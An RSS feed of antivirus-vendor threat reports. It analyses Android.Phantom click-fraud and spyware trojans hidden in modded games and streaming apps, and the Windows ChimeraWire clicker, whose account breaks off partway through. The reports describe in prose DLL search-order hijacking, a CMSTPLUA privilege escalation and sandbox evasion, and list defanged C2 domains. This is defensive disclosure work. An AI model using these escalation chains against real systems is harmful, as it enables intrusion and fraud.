<?xml version="1.0"?>
<rss version="2.0"><channel><title>Real-time threat news</title><link>https://news.drweb.com/news/</link><description>Doctor Web news - Real-time threat news</description><image><url>https://st.drweb.com/static/drweb_logo_en.gif</url><link>https://news.drweb.com/news/</link><title>Dr.Web anti-virus</title></image><item><guid>https://news.drweb.com/show/?i=15110&amp;lng=en</guid><title>Android.Phantom trojans are bundled with modded games and popular apps to infiltrate smartphones. They use machine learning and video broadcasts to engage in click fraud</title><link>https://news.drweb.com/show/?i=15110&amp;lng=en&amp;c=23</link><pubDate>Wed, 21 Jan 2026 05:00:00 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;January 21, 2025&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;newslead&gt;Experts at the Doctor Web antivirus laboratory have discovered and investigated a new trojan clicker malware family. All of these trojans either are administered via the &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt; server or get downloaded and launched after the corresponding instruction is received from the remote host. Malware belonging to this family infects Android smartphones.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Xiaomi’s GetApps software catalogue is one of its principal distribution channels.&lt;/p&gt;&lt;div class="img img-two-v same-height mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/01_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/01_Android.Phantom.1.png" alt="#drweb"&gt; &lt;/a&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/02_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/02_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;We have been able to identify multiple games that contain the trojans. 
They include: Creation Magic World (over 32k downloads), Cute Pet House (over 34k downloads), Amazing Unicorn Party (over 13k downloads), Sakura Dream Academy (over 4k downloads), Theft Auto Mafia (more than 61k downloads), and Open World Gangsters (over 11k downloads). All of the compromised games appear to have been uploaded by a single developer—SHENZHEN RUIREN NETWORK CO., LTD. The trojans are bundled with the apps and start alongside them.&lt;/p&gt;&lt;p&gt;It is also worth mentioning that the original versions of the above-listed titles contained no malicious code. On September 28-29, the developer rolled out game updates that contained the&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.2.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;trojan. This malicious program can operate in two modes that are designated in its code as the signalling and phantom modes.&lt;/p&gt;&lt;p&gt;In phantom mode, the malware uses its hidden WebView widget to load web content. Upon receiving a corresponding command from the server &lt;span class="string"&gt;hxxps[:]//playstations[.]click&lt;/span&gt;, it loads a click fraud target site and downloads a JavaScript file named “phantom”. The file incorporates an automation script for interacting with ads on the site as well as the TensorFlowJS machine learning framework. The framework model is downloaded to the app’s directory from the server &lt;span class="string"&gt;hxxps[:]//app-download[.]cn-wlcb[.]ufileos[.]com&lt;/span&gt;. To work with certain types of ads,&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.2.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;outputs the content to a virtual screen and takes screenshots. 
The trojan will then use TensorFlowJS routines to analyse them and tap on the identified relevant elements.&lt;/p&gt;&lt;p&gt;In signalling mode, the trojan employs WebRTC to connect to a third-party server. This technology enables browsers and other apps to establish peer-to-peer connections and exchange data, audio, and video in real time with no additional software needing to be installed. When the signalling mode is enabled, the previously mentioned server &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt; acts as a central server to help the WebRTC nodes find each other. This server also determines whether the trojan should run in phantom or signalling mode. Tasks related to targeted sites are provided by &lt;span class="string"&gt;hxxps[:]//playstations[.]click&lt;/span&gt;. Then&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.2.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;covertly transmits to the perpetrators a video showing a loaded website on a virtual screen. The trojan allows the connected WebRTC peer to remotely control the browser on the virtual screen: tap, scroll, and enter or paste text into the input form.&lt;/p&gt;&lt;p&gt;On October 15-16, yet another update was released for the above-mentioned games. In addition to&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.2.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;, they delivered the&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.5&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;&amp;nbsp;module. It is a dropper that retrieves&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.4.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;from other remote hosts. This malicious program downloads several other click-fraud trojans to operate on various sites. 
These modules feature a simpler design compared to&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.2.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;—they're not enhanced with machine learning and streaming features but rely on pre-defined click-fraud routines in JavaScript.&lt;/p&gt;&lt;p&gt;To use WebRTC, the trojan requires the Java API, which is not shipped with Android by default and normally doesn't get downloaded with apps. That’s why at first, the trojan mostly ran in phantom mode. However, once&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.5&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;&amp;nbsp;had been introduced into the apps,&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.2.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;was further enhanced with the&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.4.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;dropper that delivered the API library it required.&lt;/p&gt;&lt;p&gt;Attackers also use other distribution channels to spread&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.2.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;and&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.5&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;. 
For example, Spotify app mods with premium features unlocked are made available on various sites and in Telegram channels, including:&lt;/p&gt;&lt;div class="flex justify-center gap-3"&gt;&lt;div class="flex flex-col gap-3"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/03_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/03_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Spotify Plus&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-3"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/04_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/04_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Spotify Pro&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;Telegram channels:&lt;/p&gt;&lt;div class="flex flex-col md:flex-row justify-center gap-3"&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/05_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/05_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Spotify Pro&lt;/i&gt;&lt;br&gt;&lt;i&gt;(54,400 subscribers)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/06_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/06_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p 
class="text-center"&gt;&lt;i&gt;Spotify Plus – Official&lt;/i&gt;&lt;br&gt;&lt;i&gt;(15,057 subscribers)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;The altered Spotify app that perpetrators offer on the websites and in the Telegram channels is bundled with&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.2.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;and the WebRTC library.&lt;/p&gt;&lt;p&gt;In addition to the Spotify app mods, attackers also incorporate trojans into modified apps for other popular streaming services, including YouTube, Deezer, Netflix and more. These are usually available on portals offering modded APK files:&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/07_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/07_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Apkmody&lt;/i&gt;&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/08_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/08_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Moddroid&lt;/i&gt;&lt;/p&gt;&lt;p&gt;The Moddroid portal features the “Editor's Choice” section. Only 4 of the editor’s 20 picks proved to be malware-free. The remaining 16 contained &lt;strong&gt;Android.Phantom&lt;/strong&gt; trojans. The apps found on these two sites are loaded from the same CDN server at &lt;span class="string"&gt;hxxps[:]//cdn[.]topmongo[.]com&lt;/span&gt;. 
These catalogues are also available as Telegram channels where users download modified APK files containing trojans:&lt;/p&gt;&lt;div class="flex flex-col md:flex-row justify-center gap-3"&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/09_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/09_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Moddroid.com&lt;/i&gt;&lt;br&gt;&lt;i&gt;(87,653 subscribers)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/10_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/10_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Apkmody Chat&lt;/i&gt;&lt;br&gt;&lt;i&gt;(6,297 subscribers)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;Criminals also use Discord servers to promote and spread the infected apps. Spotify X is the most popular one. 
It has about 24,000 subscribers.&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/11_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/11_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/12_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/12_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Its administrators don't shy away from offering compromised APK files to users in a more direct fashion. For example, the screenshot above shows how an administrator is offering visitors a Deezer music streaming app for download instead of a Spotify application, since the latter has stopped working.&lt;/p&gt;&lt;p&gt;The download link will provide the user with a program that actually works. Its code is protected with a proprietary packer concealing&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.1.origin&lt;/b&gt;&lt;/a&gt;. Upon receiving an instruction from &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt;, it will download the now well-familiar&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.2.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;,&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.5&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;, and the spyware trojan &lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.5.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt;. 
The latter relays to the attackers information about the device—including the phone number, location, and a list of the installed apps.&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/13_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/13_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;This screenshot of the server shows what languages the impacted users speak. To access chat rooms in languages other than English, they have to react to the appropriate flag. Users who spoke Spanish, French, German, Polish and Italian appeared to be in the majority (English, which appears to be the server’s default language, is not factored in). Furthermore, the server administrators didn’t set up chat rooms for many Asian countries.&lt;/p&gt;&lt;p&gt;These trojans can inflict severe damage on the owners of infected devices. Here are just a few of the possible adverse consequences:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;&lt;strong&gt;An unsuspecting accomplice.&lt;/strong&gt; A user's smartphone can be commandeered to partake in a DDoS attack and, by doing so, get its owner unwittingly involved in a cybercrime.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Illegal activity.&lt;/strong&gt; Attackers can use a compromised device to conduct illegal activities: run online fraud schemes or send spam messages.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Increased battery use and traffic.&lt;/strong&gt; Covert activities drain the battery and increase mobile data usage.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Personal data leaks.&lt;/strong&gt; &lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.5.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt; is spyware that will transmit information about the device and its owner to a third party.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Trojans of this strain pose a threat to 
Android device owners who don't use up-to-date antivirus software. Sometimes users experience availability issues involving foreign online services, which forces them to seek out and use alternative and often shady methods to circumvent restrictions. This situation plays into the hands of virus makers as users are more likely to take chances and put their faith in dubious techniques. Children are particularly vulnerable. In their drive to play videogames, listen to music or watch videos, they tend to completely disregard information security basics.&lt;/p&gt;&lt;p&gt;We strongly advise you against downloading modified APK files from dubious sites and Telegram channels. As a rule, verifying the sources of such mods or apps takes time and requires some experience. That’s why using Dr.Web Security Space is probably the best way to ensure that you and your loved ones enjoy a worry-free experience with your mobile devices. Dr.Web protects not only smartphones but also game consoles, tablets and smart TVs.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Phantom/README.adoc"&gt;Indicators of compromise&lt;/a&gt;&lt;br /&gt;
More about &lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.1.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
More about &lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.2.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
More about &lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.3&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.3&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
More about &lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.4.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
More about &lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.5&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
More about &lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.5.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15090&amp;lng=en</guid><title>Bellerophon could never have imagined. The ChimeraWire trojan boosts website popularity by skillfully pretending to be human</title><link>https://news.drweb.com/show/?i=15090&amp;lng=en&amp;c=23</link><pubDate>Mon, 08 Dec 2025 05:00:00 GMT</pubDate><description>&lt;div class="vir_rev_btn center justify-center"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/ChimeraWire_en_pdf.pdf" class='btn'&gt;Download PDF&lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;&lt;b&gt;December 8, 2025&lt;/b&gt;&lt;/p&gt;

&lt;h3&gt;Introduction&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;While analyzing one of the affiliate programs, Doctor Web’s experts discovered a unique piece of malware with clicker functionality and dubbed it &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;. This malware targets computers running Microsoft Windows and is based on the open-source projects &lt;a href="https://github.com/sohaha/zlsgo" target="_blank"&gt;zlsgo&lt;/a&gt; and &lt;a href="https://go-rod.github.io/" target="_blank"&gt;Rod&lt;/a&gt; for automated website and web application management.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; allows cybercriminals to simulate user actions and boost the behavioral factor of websites by artificially increasing their rankings in search engine results. For this, the malicious app searches target Internet resources in the Google and Bing search engines and then loads them. It also imitates user actions by clicking links on the loaded sites. The trojan performs all malicious actions in the Google Chrome web browser, which it downloads from a certain domain and then launches it in debug mode over the WebSocket protocol.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; gets onto computers with the help of several malicious downloaders. They utilize various privilege escalation techniques based on exploiting DLL Search Order Hijacking vulnerabilities, as well as anti-debugging techniques, in order to avoid detection. Our anti-virus laboratory has tracked at least 2 infection chains involving these malicious programs. In one of them, the malicious script &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; takes center stage. In the other—the centerpiece is &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;, whose operating principle is similar to that of &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;; in fact, this downloader is an alternative to the malicious script.&lt;/p&gt;

&lt;p&gt;In this study, we will cover the features of &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; and the malicious apps that deliver it to users’ devices.&lt;/p&gt;

&lt;h3&gt;First infection chain&lt;/h3&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/01_ChimeraWire_chain1_en.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/01_ChimeraWire_chain1_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;A scheme that illustrates the first infection chain&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The first infection chain starts with &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.54600&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt;. This malware verifies whether it is operating in an artificial environment and terminates if it detects signs of a virtual machine or the debug mode. If no such signs exist, the trojan downloads the ZIP archive &lt;span class="string"&gt;python3.zip&lt;/span&gt; from the C2 server. It contains the malicious script &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; along with some additional files that it needs to operate, e.g., the malicious library &lt;span class="string"&gt;ISCSIEXE.dll&lt;/span&gt; (&lt;a href="https://vms.drweb.com/search/?q=Trojan.Starter.8377&amp;lng=en"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt;). &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.54600&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt; extracts the archive and runs the script. The latter is the second infection stage and represents the downloader that receives the next stage from the C2 server.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;’s behavior depends on the rights it has when executed. If the script is running without administrator privileges, it tries to obtain them. For this, &lt;a href="https://vms.drweb.com/search/?q=Trojan.Starter.8377&amp;lng=en"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt; (extracted along with it) is copied to the directory &lt;span class="string"&gt;%LOCALAPPDATA%\Microsoft\WindowsApps&lt;/span&gt;. Moreover, a script &lt;span class="string"&gt;runs.vbs&lt;/span&gt; is created that will later be used to re-launch &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Next, &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; launches the system app &lt;span class="string"&gt;%SystemRoot%\SysWOW64\iscsicpl.exe&lt;/span&gt;. Because a DLL Search Order Hijacking class vulnerability is present in it, it automatically loads the trojan library &lt;span class="string"&gt;ISCSIEXE.dll&lt;/span&gt;, whose name matches the name of a legitimate Windows component.&lt;/p&gt;

&lt;p&gt;In turn, &lt;a href="https://vms.drweb.com/search/?q=Trojan.Starter.8377&amp;lng=en"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt; runs the VBS script &lt;span class="string"&gt;runs.vbs&lt;/span&gt;, which then executes &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; again, but already as administrator.&lt;/p&gt;

&lt;p&gt;When executed with the necessary privileges, &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; downloads the password-protected archive &lt;span class="string"&gt;onedrive.zip&lt;/span&gt; from the C2 server. It contains the next infection stage, which is &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.54318&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt; (it comes as the library &lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt;), and the additional files required for it to operate (for instance, the legitimate app &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt;, which is part of the OneDrive software from the Windows OS and has a valid digital signature).&lt;/p&gt;

&lt;p&gt;After extracting the archive, &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; creates a System Scheduler task for running the app &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; at system boot. Next, it launches this program. Because it has a DLL Search Order Hijacking vulnerability, the app automatically loads the malicious library &lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt;, whose name matches the name of the OneDrive software component.&lt;/p&gt;

&lt;p&gt;Once &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.54318&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt; gains control, it checks whether it has launched in an artificial environment. If it detects any sign that it is operating on a virtual machine or in debug mode, it terminates.&lt;/p&gt;

&lt;p&gt;If such signs are not detected, the trojan library tries to download the payload from the C2 server as well as the keys for its decryption. &lt;/p&gt;

&lt;p&gt;The decrypted payload is a ZLIB container with a shellcode and an executable file. After decrypting the container, &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.54318&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt; tries to unpack it. If it fails to do so, the trojan deletes itself and terminates its active process. If the unpacking is successful, control is handed to the shellcode, whose task is to unzip the executable that comes with it. This file represents the final infection stage, which is the target trojan &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;Second infection chain&lt;/h3&gt;

&lt;p&gt;The second infection chain starts with the &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; malware. When launched, it verifies whether it has administrator rights and tries to obtain them if they are missing. The trojan uses the Masquerade PEB technique to bypass the security system, disguising itself as the legitimate process &lt;span class="string"&gt;explorer.exe&lt;/span&gt;.&lt;/p&gt;

&lt;p&gt;Next, it patches the copy of the system library &lt;span class="string"&gt;%SystemRoot%\System32\ATL.dll&lt;/span&gt;. To do so, &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; reads its contents, adds a decrypted bytecode to it along with the path to the trojan’s file, and then saves the modified copy as the file &lt;span class="string"&gt;dropper&lt;/span&gt; in the same directory where it is located. After that, the trojan initializes the COM model objects of the Windows Shell for the service &lt;span class="string"&gt;%SystemRoot%\System32\wbem&lt;/span&gt; and the modified library. If this initialization is successful, &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; tries to obtain administrator rights by using the CMSTPLUA COM interface, exploiting a vulnerability that is typical for some old COM interfaces.&lt;/p&gt;

&lt;p&gt;If successful, the modified library &lt;span class="string"&gt;dropper&lt;/span&gt; is copied to the directory &lt;span class="string"&gt;%SystemRoot%\System32\wbem&lt;/span&gt; as the file &lt;span class="string"&gt;ATL.dll&lt;/span&gt;. After that, &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; launches the Windows Management Instrumentation console &lt;span class="string"&gt;WmiMgmt.msc&lt;/span&gt;. As a result, a DLL Search Order Hijacking vulnerability is exploited in the system app &lt;span class="string"&gt;mmc.exe&lt;/span&gt;, and it automatically loads the patched library &lt;span class="string"&gt;%SystemRoot%\System32\wbem\ATL.dll&lt;/span&gt;. In turn, this library launches &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; again, but this time—with administrator rights.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
